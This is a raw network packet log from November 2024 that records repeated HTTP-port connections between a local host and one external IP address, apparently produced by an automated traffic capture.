Nov 25, 2024 22:37:51.086030960 CET	80	49759	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:51.086050034 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:51.086106062 CET	49759	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:51.086220026 CET	49759	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:51.206350088 CET	80	49759	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:51.442308903 CET	49759	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:51.562908888 CET	80	49759	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:52.356625080 CET	80	49759	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:52.410981894 CET	49759	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:52.592216015 CET	80	49759	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:52.707854033 CET	49759	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:52.724526882 CET	49760	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:52.844717979 CET	80	49760	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:52.846008062 CET	49760	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:52.846168041 CET	49760	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:52.966768980 CET	80	49760	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.192446947 CET	49760	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.286180019 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.313080072 CET	80	49760	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.407126904 CET	80	49761	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.407253027 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.407455921 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.527446985 CET	80	49761	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.632253885 CET	49760	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.755064964 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.794436932 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.795762062 CET	80	49760	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.867724895 CET	80	49760	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.867785931 CET	49760	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.875272036 CET	80	49761	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.875446081 CET	80	49761	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.914561987 CET	80	49762	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:53.914638042 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:53.914763927 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:54.034874916 CET	80	49762	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:54.270436049 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:54.390656948 CET	80	49762	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:54.760787964 CET	80	49761	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:54.879798889 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:54.999799967 CET	80	49761	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:55.192231894 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.307636976 CET	80	49762	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:55.379746914 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.562005043 CET	80	49762	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:55.693137884 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.742106915 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.742171049 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.742868900 CET	49763	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.862943888 CET	80	49761	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:55.862984896 CET	80	49763	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:55.863014936 CET	49761	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.863017082 CET	80	49762	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:55.863068104 CET	49763	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.863085985 CET	49762	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.863256931 CET	49763	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:55.983279943 CET	80	49763	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:56.208956957 CET	49763	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:56.329319954 CET	80	49763	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:57.226751089 CET	80	49763	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:57.395384073 CET	49763	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:57.482188940 CET	80	49763	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:57.596354008 CET	49763	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:57.597002983 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:57.717257023 CET	80	49763	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:57.717375040 CET	80	49765	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:57.717463017 CET	49763	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:57.717485905 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:57.717674017 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:57.837802887 CET	80	49765	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:58.067516088 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:58.187840939 CET	80	49765	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:59.042995930 CET	80	49765	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:59.207900047 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.285012007 CET	80	49765	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:59.385569096 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.408241987 CET	49759	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.418023109 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.419131041 CET	49766	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.538336992 CET	80	49765	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:59.538398981 CET	49765	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.539119959 CET	80	49766	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:59.539192915 CET	49766	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.539345026 CET	49766	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:59.659249067 CET	80	49766	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:59.895481110 CET	49766	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.008076906 CET	49766	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.008434057 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.015479088 CET	80	49766	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.126430035 CET	49768	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.128439903 CET	80	49767	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.132126093 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.132231951 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.175693035 CET	80	49766	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.246629953 CET	80	49768	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.247894049 CET	49768	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.248042107 CET	49768	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.252449989 CET	80	49767	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.372454882 CET	80	49768	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.489365101 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.597296953 CET	80	49766	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.597361088 CET	49766	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.598606110 CET	49768	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:00.609469891 CET	80	49767	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.609613895 CET	80	49767	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:00.719146967 CET	80	49768	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:01.500427008 CET	80	49767	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:01.567265987 CET	80	49768	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:01.582925081 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:01.611054897 CET	49768	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:01.749263048 CET	80	49767	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:01.799715996 CET	80	49768	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:01.879781961 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:01.954893112 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:01.954978943 CET	49768	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:01.955858946 CET	49775	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:02.075341940 CET	80	49767	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:02.075403929 CET	49767	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:02.076109886 CET	80	49775	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:02.076179028 CET	80	49768	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:02.076194048 CET	49775	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:02.076226950 CET	49768	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:02.076363087 CET	49775	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:02.196297884 CET	80	49775	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:02.426750898 CET	49775	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:02.547080994 CET	80	49775	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:03.347284079 CET	80	49775	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:03.395416021 CET	49775	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:03.583692074 CET	80	49775	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:03.584609985 CET	49775	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:03.705914021 CET	80	49775	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:03.706778049 CET	49775	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:03.817538023 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:03.937618971 CET	80	49781	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:03.937887907 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:03.977061033 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:04.097075939 CET	80	49781	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:04.371973991 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:04.492034912 CET	80	49781	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:05.315520048 CET	80	49781	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:05.364200115 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:05.570375919 CET	80	49781	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:05.614193916 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:05.690197945 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:05.691087008 CET	49787	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:05.810869932 CET	80	49781	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:05.811069012 CET	49781	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:05.811111927 CET	80	49787	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:05.811191082 CET	49787	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:05.811302900 CET	49787	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:05.931435108 CET	80	49787	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:06.161139011 CET	49787	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:06.281254053 CET	80	49787	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:06.757179976 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:06.757652044 CET	49787	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:06.877198935 CET	80	49788	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:06.877877951 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:06.877995014 CET	80	49787	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:06.878066063 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:06.878096104 CET	49787	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:06.998121977 CET	80	49788	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:07.224030972 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:07.344338894 CET	80	49788	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:07.344371080 CET	80	49788	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:07.452692032 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:07.572861910 CET	80	49789	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:07.572930098 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:07.573131084 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:07.693104029 CET	80	49789	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:07.926800966 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:08.046986103 CET	80	49789	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:08.194628000 CET	80	49788	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:08.395450115 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:08.437388897 CET	80	49788	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:08.504805088 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:08.919553041 CET	80	49789	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:09.020432949 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.165026903 CET	80	49789	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:09.207942009 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.282912970 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.282979965 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.283638000 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.403394938 CET	80	49788	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:09.403456926 CET	49788	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.403613091 CET	80	49795	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:09.403721094 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.403858900 CET	80	49789	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:09.403892040 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.403932095 CET	49789	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.523799896 CET	80	49795	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:09.758265018 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:09.878546953 CET	80	49795	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:10.720138073 CET	80	49795	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:10.817368031 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:10.969686985 CET	80	49795	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:11.020452023 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:11.096189022 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:11.096868038 CET	49801	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:11.216797113 CET	80	49795	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:11.216896057 CET	80	49801	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:11.216959000 CET	49795	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:11.216998100 CET	49801	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:11.217164040 CET	49801	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:11.337503910 CET	80	49801	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:11.567393064 CET	49801	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:11.687525034 CET	80	49801	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:12.580275059 CET	80	49801	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:12.639132977 CET	49801	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:12.834297895 CET	80	49801	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.004837990 CET	49801	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.160511017 CET	49807	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.280503035 CET	80	49807	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.280639887 CET	49807	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.280944109 CET	49807	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.401226044 CET	80	49807	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.443536997 CET	49807	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.443588972 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.563648939 CET	80	49808	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.563713074 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.563854933 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.572645903 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.603771925 CET	80	49807	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.683821917 CET	80	49808	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.692838907 CET	80	49809	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.692914009 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.693063974 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:13.813422918 CET	80	49809	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:13.911257029 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:14.031486034 CET	80	49808	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:14.031543016 CET	80	49808	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:14.051836014 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:14.171888113 CET	80	49809	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:14.302319050 CET	80	49807	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:14.304290056 CET	49807	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:14.926454067 CET	80	49808	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:15.004864931 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.010190010 CET	80	49809	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:15.208000898 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.216677904 CET	80	49808	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:15.256994009 CET	80	49809	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:15.317344904 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.395591974 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.868526936 CET	49801	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.869551897 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.869776964 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.870520115 CET	49812	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.990559101 CET	80	49808	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:15.990598917 CET	80	49812	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:15.990614891 CET	49808	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.990726948 CET	49812	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.990730047 CET	80	49809	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:15.990818024 CET	49809	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:15.991009951 CET	49812	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:16.111449003 CET	80	49812	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:16.348705053 CET	49812	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:16.468760014 CET	80	49812	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:17.307492018 CET	80	49812	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:17.520477057 CET	49812	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:17.548887014 CET	80	49812	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:17.675390005 CET	49812	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:17.676671028 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:17.796514034 CET	80	49812	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:17.796582937 CET	49812	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:17.797552109 CET	80	49817	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:17.797637939 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:17.797816992 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:17.917779922 CET	80	49817	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:18.147046089 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:18.267083883 CET	80	49817	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:19.122361898 CET	80	49817	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:19.208013058 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:19.360945940 CET	80	49817	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:19.520519018 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:19.534735918 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:19.535398006 CET	49823	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:19.655112982 CET	80	49817	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:19.655189991 CET	49817	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:19.655329943 CET	80	49823	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:19.655420065 CET	49823	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:19.655529976 CET	49823	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:19.775475979 CET	80	49823	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.004967928 CET	49823	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.125364065 CET	80	49823	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.224772930 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.225014925 CET	49823	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.344842911 CET	80	49824	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.344912052 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.345016956 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.349353075 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.391782045 CET	80	49823	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.465039968 CET	80	49824	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.469348907 CET	80	49825	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.469413996 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.469507933 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.589504004 CET	80	49825	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.667923927 CET	80	49823	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.667999029 CET	49823	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.692573071 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.812763929 CET	80	49824	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.812823057 CET	80	49824	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:20.817441940 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:20.937439919 CET	80	49825	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:21.615932941 CET	80	49824	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:21.708020926 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:21.832458973 CET	80	49825	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:21.851911068 CET	80	49824	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:21.895513058 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.020505905 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.150496006 CET	80	49825	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:22.192002058 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.304285049 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.304378033 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.305115938 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.424659014 CET	80	49824	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:22.424737930 CET	49824	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.425344944 CET	80	49831	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:22.425425053 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.425429106 CET	80	49825	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:22.425472975 CET	49825	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.425575972 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.545834064 CET	80	49831	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:22.770597935 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:22.890635014 CET	80	49831	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:23.696367025 CET	80	49831	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:23.895531893 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:23.935861111 CET	80	49831	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:24.004944086 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:24.090742111 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:24.092369080 CET	49836	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:24.212882996 CET	80	49831	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:24.212932110 CET	49831	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:24.213941097 CET	80	49836	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:24.214001894 CET	49836	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:24.214346886 CET	49836	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:24.334398985 CET	80	49836	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:24.567521095 CET	49836	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:24.687731028 CET	80	49836	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:25.483406067 CET	80	49836	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:25.708055019 CET	49836	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:25.715715885 CET	80	49836	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:25.847290039 CET	49836	80	192.168.2.4	37.44.238.250
